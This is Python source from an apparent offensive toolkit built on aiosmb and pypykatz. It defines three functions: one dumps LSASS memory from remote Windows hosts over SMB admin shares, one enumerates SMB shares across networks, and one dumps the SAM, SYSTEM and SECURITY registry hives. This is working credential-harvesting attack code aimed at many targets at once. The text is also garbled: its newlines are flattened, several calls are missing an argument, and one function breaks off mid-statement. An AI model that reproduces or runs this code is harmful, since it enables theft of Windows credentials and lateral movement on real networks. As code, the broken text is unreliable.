async def lsassdump(url, method='task', remote_base_path='C:\\Windows\\Temp\\', remote_share_name='\\c$\\Windows\\Temp\\', chunksize=64 * 1024, packages=['all'], targets=[], worker_cnt=5): from aiosmb.commons.connection.url import SMBConnectionURL base_url = None base_conn = None mimis = [] workers = [] tgens = [] if targets is not None and len(targets) != 0: notfile = [] if targets is not None: for target in targets: try: f = open(target, 'r') f.close() tgens.append(FileTargetGen(target)) except: notfile.append(target) if len(notfile) > 0: tgens.append(ListTargetGen(notfile)) if isinstance(url, SMBConnectionURL): base_url = url base_conn = url.get_connection() else: base_url = SMBConnectionURL(url) base_conn = base_url.get_connection() lsassdump_coro = lsassdump_single(, base_conn, method=method, remote_base_path=remote_base_path, remote_share_name=remote_share_name, chunksize=chunksize, packages=packages) workers.append(lsassdump_coro) for tgen in tgens: async for _, target, err in tgen.generate(): tconn = base_url.create_connection_newtarget(target) lsassdump_coro = lsassdump_single(, tconn, method=method, remote_base_path=remote_base_path, remote_share_name=remote_share_name, chunksize=chunksize, packages=packages) workers.append(lsassdump_coro) if len(workers) >= worker_cnt: tres = await asyncio.gather(*workers) for res in tres: yield res workers = [] if len(workers) > 0: tres = await asyncio.gather(*workers) for res in tres: yield res workers = []
async def shareenum(smb_url, ldap_url=None, targets=None, smb_worker_count=10, depth=3, out_file=None, progress=False, max_items=None, dirsd=False, filesd=False, authmethod='ntlm', protocol_version='2', output_type='str', max_runtime=None, exclude_share=['print$'], exclude_dir=[], exclude_target=[]): from aiosmb.commons.connection.url import SMBConnectionURL from pypykatz.alsadecryptor.asbmfile import SMBFileReader from pypykatz.apypykatz import apypykatz #if targets is None and ldap_url is None: # raise Exception('Shareenum needs a list of targets or LDAP connection string') if smb_url == 'auto': smb_url = get_smb_url(authmethod=authmethod, protocol_version=protocol_version) enumerator = SMBFileEnum(smb_url, worker_count=smb_worker_count, depth=depth, out_file=out_file, show_pbar=progress, max_items=max_items, fetch_dir_sd=dirsd, fetch_file_sd=filesd, output_type=output_type, max_runtime=max_runtime, exclude_share=exclude_share, exclude_dir=exclude_dir, exclude_target=exclude_target) notfile = [] if targets is not None: for target in targets: try: f = open(target, 'r') f.close() enumerator.target_gens.append(FileTargetGen(target)) except: notfile.append(target) if len(notfile) > 0: enumerator.target_gens.append(ListTargetGen(notfile)) if ldap_url is not None: if ldap_url == 'auto': ldap_url = get_ldap_url(authmethod=authmethod) enumerator.target_gens.append(LDAPTargetGen(ldap_url)) if len(enumerator.target_gens) == 0: enumerator.enum_url = True #raise Exception('No suitable targets found!') await
async def regdump(url, hives=['HKLM\\SAM', 'HKLM\\SYSTEM', 'HKLM\\SECURITY'], remote_base_path='C:\\Windows\\Temp\\', remote_share_name='\\c$\\Windows\\Temp\\', enable_wait=3, targets=[], worker_cnt=5): from aiosmb.commons.connection.url import SMBConnectionURL base_url = None base_conn = None mimis = [] workers = [] tgens = [] if targets is not None and len(targets) != 0: notfile = [] if targets is not None: for target in targets: try: f = open(target, 'r') f.close() tgens.append(FileTargetGen(target)) except: notfile.append(target) if len(notfile) > 0: tgens.append(ListTargetGen(notfile)) if isinstance(url, SMBConnectionURL): base_url = url base_conn = url.get_connection() else: base_url = SMBConnectionURL(url) base_conn = base_url.get_connection() regdump_coro = regdump_single(, base_conn, hives=hives, remote_base_path=remote_base_path, remote_share_name=remote_share_name, enable_wait=enable_wait) workers.append(regdump_coro) for tgen in tgens: async for _, target, err in tgen.generate(): tconn = base_url.create_connection_newtarget(target) regdump_coro = regdump_single(, tconn, hives=hives, remote_base_path=remote_base_path, remote_share_name=remote_share_name, enable_wait=enable_wait) workers.append(regdump_coro) if len(workers) >= worker_cnt: tres = await asyncio.gather(*workers) for res in tres: yield res workers = [] if len(workers) > 0: tres = await asyncio.gather(*workers) for res in tres: yield res workers = []